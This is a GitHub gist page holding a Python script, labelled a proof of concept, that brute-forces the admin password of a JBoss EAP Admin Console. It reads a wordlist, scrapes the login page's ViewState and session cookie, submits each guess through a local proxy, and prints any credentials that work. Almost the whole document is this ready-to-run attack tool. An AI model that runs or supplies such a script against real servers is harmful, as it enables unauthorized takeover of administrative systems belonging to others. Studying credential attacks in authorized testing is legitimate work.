Skip to content

Instantly share code, notes, and snippets.

@itsecurityco
Created September 10, 2014 00:52
Show Gist options
  • Save itsecurityco/a1852e245979ecc42c66 to your computer and use it in GitHub Desktop.
Save itsecurityco/a1852e245979ecc42c66 to your computer and use it in GitHub Desktop.
"""
Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999)
Author: @itsecurityco
Use: python bruteforce(PoC).py ip:port wordlist
"""
import re
import sys
import urllib
import requests
from time import time
from colorama import Fore, Back, Style, init
init()
start_time = time()
HOST = sys.argv[1]
WORDLIST = sys.argv[2]
# Burp suite proxy.
proxies = {"http": "http://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}
# Password list file.
f = open(WORDLIST, 'r')
lines = f.read().splitlines()
f.close()
for passwd in lines:
JSESSIONID = ""
# Get ViewState.
headers = {
"Host": HOST,
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Cookie": "JSESSIONID=" + JSESSIONID,
"Connection": "keep-alive",
}
r1 = requests.get("http://%s/admin-console/login.seam" % HOST, proxies=proxies, headers=headers)
m1 = re.search(r'<input type="hidden" name="javax\.faces\.ViewState" id="javax\.faces\.ViewState" value="(.*)" autocomplete="off"', r1.text)
if not m1:
print(Fore.RED + "[!] Error obteniendo ViewState.")
exit()
ViewState = m1.group(1)
# Try password.
payload = {
'login_form' : urllib.quote('login_form'),
'login_form:name' : urllib.quote('admin'),
'login_form:password' : urllib.quote(passwd),
'login_form:submit' : urllib.quote('Login'),
'javax.faces.ViewState' : urllib.quote(str(ViewState))
}
m2 = re.search(r'JSESSIONID=(.*); Path=\/admin-console', r1.headers['Set-Cookie'])
if not m2:
print(Fore.RED + "[!] Error obteniendo nuevo JSESSIONID.")
exit()
JSESSIONID = m2.group(1)
headers = {
"Host": HOST,
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://%s/admin-console/login.seam" % HOST,
"Cookie": "JSESSIONID=" + JSESSIONID,
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded"
}
r2 = requests.post("http://%s/admin-console/login.seam" % HOST, data=payload, proxies=proxies, allow_redirects=False, headers=headers)
m3 = re.search(r'log in attempt failed, please try again', r2.text)
print(Fore.GREEN + "[+] %d probando: admin:%s ..." % (r2.status_code, passwd))
if not m3:
print(Fore.YELLOW + "[!] Credenciales encontradas: admin:%s." % passwd)
break
print(Fore.GREEN + "\n--- %d seconds, %d minutes ---" % (int(time()-start_time), int(time()-start_time)/60))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment